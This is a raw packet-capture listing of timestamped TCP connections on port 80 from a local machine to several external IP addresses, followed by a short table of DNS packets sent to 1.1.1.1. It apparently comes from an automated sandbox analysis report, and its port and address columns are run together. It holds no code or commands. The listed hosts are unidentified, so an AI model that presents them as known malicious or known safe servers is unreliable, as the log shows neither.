                                              Sep 26, 2024 15:23:25.267509937 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.267520905 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.267652988 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.268162966 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.268331051 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.268455982 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.348690033 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348777056 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348783016 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348970890 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349036932 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.349124908 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349131107 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349334955 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349512100 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349522114 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349536896 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.349805117 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349812031 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349837065 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350126028 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350151062 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350271940 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350279093 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350384951 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350537062 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350543976 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350879908 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.353972912 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.357109070 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:26.189704895 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.209052086 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.214026928 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.214262962 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.226273060 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.231288910 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.231297970 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824871063 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824929953 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824939966 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824970961 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825109005 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825119972 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825129986 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825146914 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825175047 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825408936 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825419903 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825428963 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825455904 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825692892 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825748920 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.829912901 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.829982996 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.829993010 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.830030918 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.830154896 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.830199957 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.913589001 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913615942 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913625956 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913674116 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.913786888 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913796902 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913806915 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913813114 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913883924 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914222002 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914279938 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914311886 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914323092 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914375067 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914551020 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914568901 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914628983 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914920092 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915009022 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915010929 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915057898 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.915240049 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915287018 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:28.736983061 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:29.756525993 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.752060890 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.848301888 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:30.848557949 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.852695942 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:30.853094101 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.856440067 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.863260984 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454011917 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454024076 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454035997 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454204082 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.454246998 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454258919 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454364061 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454370975 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454396963 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.454401970 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454441071 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.455368042 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.455512047 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.455539942 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.456154108 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.459045887 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459074020 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459080935 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459265947 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541491032 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541533947 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541539907 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541605949 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541724920 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541731119 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541835070 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541862965 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541928053 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542023897 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542098999 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542104959 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542150021 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542239904 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542251110 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542298079 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542956114 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543044090 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543047905 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543050051 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543096066 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543168068 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543504953 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543550968 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543551922 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543607950 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.546941996 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.551830053 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:37.091840029 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.096739054 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:37.101106882 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.112127066 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.116939068 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:38.628176928 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:38.679152966 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:39.646249056 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.651228905 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:39.651293993 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.664932966 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.669787884 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:41.173986912 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:41.219111919 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.192770958 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.197634935 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.197700024 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.211833954 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.216680050 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.216840029 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:43.720757008 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:43.767108917 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:44.739581108 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.744497061 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:44.745359898 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.758128881 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.762927055 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:58.452466965 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:58.452574015 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:01.034941912 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:01.035137892 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:03.578608036 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:03.578685045 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.264643908 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:06.264764071 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.265805960 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.270570993 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:19.364834070 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.369683981 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.370183945 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.382091999 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.387053967 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.848222017 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.848287106 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:20.893080950 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:20.897917032 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:21.912827015 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.917776108 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:21.917850018 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.932420015 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.937344074 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:22.382684946 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:22.382752895 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:23.442092896 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:23.447248936 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.458714008 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.464042902 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.464179039 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.475020885 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.479933977 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.480011940 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.949656010 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.949810028 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:25.986453056 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:25.991200924 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.008244991 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.013065100 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.016184092 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.024223089 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.028983116 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.492445946 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.492887974 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.494267941 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.498075962 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.502957106 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.534687996 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.539580107 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.539664984 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.550617933 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.555510998 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.994739056 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.994874954 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:34.064575911 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:34.071039915 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.083651066 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:35.088584900 CEST80497373.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.090176105 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:35.102122068 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:35.107181072 CEST80497373.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.550893068 CEST80497373.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.552839041 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:36.611437082 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:36.616775990 CEST80497373.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:37.630801916 CEST4973880192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:37.635734081 CEST80497383.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:37.635821104 CEST4973880192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:37.648211002 CEST4973880192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:37.654695034 CEST80497383.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:37.654850006 CEST80497383.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:38.092602968 CEST80497383.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:38.092660904 CEST4973880192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:39.160135031 CEST4973880192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:39.165190935 CEST80497383.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:40.180680037 CEST4973980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:40.185825109 CEST80497393.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:40.185909033 CEST4973980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:40.196541071 CEST4973980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:40.201431990 CEST80497393.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:40.651166916 CEST80497393.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:40.651357889 CEST80497393.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:40.651607990 CEST4973980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:40.654217005 CEST4973980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:40.659049988 CEST80497393.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:45.896491051 CEST4974080192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:45.901509047 CEST804974085.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:45.901595116 CEST4974080192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:45.915941954 CEST4974080192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:45.921030045 CEST804974085.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:46.626456976 CEST804974085.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:46.626894951 CEST804974085.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:46.626949072 CEST804974085.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:46.627043009 CEST4974080192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:47.424271107 CEST4974080192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:48.443820000 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:48.453391075 CEST804974185.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:48.453488111 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:48.466774940 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:48.478318930 CEST804974185.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:49.257050991 CEST804974185.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:49.258821964 CEST804974185.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:49.258840084 CEST804974185.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:49.258934975 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:49.258934975 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:49.970933914 CEST4974180192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:51.026884079 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:51.032505035 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.038302898 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:51.057895899 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:51.068254948 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.069972992 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.979511023 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.979636908 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.979650974 CEST804974285.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:51.979676962 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:51.979708910 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:52.564632893 CEST4974280192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:53.882705927 CEST4974380192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:53.887908936 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:53.887994051 CEST4974380192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:53.900444984 CEST4974380192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:53.930485964 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:54.665582895 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:54.666361094 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:54.666378021 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:54.672158957 CEST4974380192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:54.678117037 CEST4974380192.168.2.585.153.138.113
                                              Sep 26, 2024 15:24:54.683541059 CEST804974385.153.138.113192.168.2.5
                                              Sep 26, 2024 15:24:59.819639921 CEST4974480192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:24:59.824601889 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:24:59.824667931 CEST4974480192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:24:59.838757038 CEST4974480192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:24:59.843777895 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:00.941833973 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:00.941847086 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:00.941863060 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:00.941867113 CEST8049744172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:00.942004919 CEST4974480192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:01.346101999 CEST4974480192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:02.893795967 CEST4974580192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:02.899184942 CEST8049745172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:02.899281025 CEST4974580192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:02.910291910 CEST4974580192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:02.915215969 CEST8049745172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:03.908273935 CEST8049745172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:03.909883976 CEST8049745172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:03.909946918 CEST4974580192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:04.424560070 CEST4974580192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:05.992919922 CEST4974680192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:05.998013973 CEST8049746172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:05.998135090 CEST4974680192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:06.011473894 CEST4974680192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:06.016449928 CEST8049746172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:06.016462088 CEST8049746172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:07.010147095 CEST8049746172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:07.011473894 CEST8049746172.67.165.25192.168.2.5
                                              Sep 26, 2024 15:25:07.014255047 CEST4974680192.168.2.5172.67.165.25
                                              Sep 26, 2024 15:25:07.517755032 CEST4974680192.168.2.5172.67.165.25

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 15:22:24.954106092 CEST5939453192.168.2.51.1.1.1
                                              Sep 26, 2024 15:22:25.016787052 CEST53593941.1.1.1192.168.2.5
                                              Sep 26, 2024 15:22:40.724934101 CEST6062253192.168.2.51.1.1.1
                                              Sep 26, 2024 15:22:40.759285927 CEST53606221.1.1.1192.168.2.5
                                              Sep 26, 2024 15:22:54.224633932 CEST6187853192.168.2.51.1.1.1
                                              Sep 26, 2024 15:22:54.491645098 CEST53618781.1.1.1192.168.2.5
                                              Sep 26, 2024 15:23:07.699139118 CEST5922153192.168.2.51.1.1.1
                                              Sep 26, 2024 15:23:07.712119102 CEST53592211.1.1.1192.168.2.5
                                              Sep 26, 2024 15:23:21.990358114 CEST5147353192.168.2.51.1.1.1
                                              Sep 26, 2024 15:23:22.109816074 CEST53514731.1.1.1192.168.2.5
                                              Sep 26, 2024 15:23:36.552768946 CEST5961953192.168.2.51.1.1.1
                                              Sep 26, 2024 15:23:37.089288950 CEST53596191.1.1.1192.168.2.5
                                              Sep 26, 2024 15:24:11.272336960 CEST5701653192.168.2.51.1.1.1
                                              Sep 26, 2024 15:24:11.280822992 CEST53570161.1.1.1192.168.2.5
                                              Sep 26, 2024 15:24:19.334300041 CEST5089353192.168.2.51.1.1.1
                                              Sep 26, 2024 15:24:19.360846043 CEST53508931.1.1.1192.168.2.5
                                              Sep 26, 2024 15:24:32.505887032 CEST5756053192.168.2.51.1.1.1
                                              Sep 26, 2024 15:24:32.532193899 CEST53575601.1.1.1192.168.2.5
                                              Sep 26, 2024 15:24:45.664087057 CEST5222653192.168.2.51.1.1.1
                                              Sep 26, 2024 15:24:45.893224955 CEST53522261.1.1.1192.168.2.5
                                              Sep 26, 2024 15:24:59.678277016 CEST5043653192.168.2.51.1.1.1
                                              Sep 26, 2024 15:24:59.815284014 CEST53504361.1.1.1192.168.2.5

                                              DNS Queries

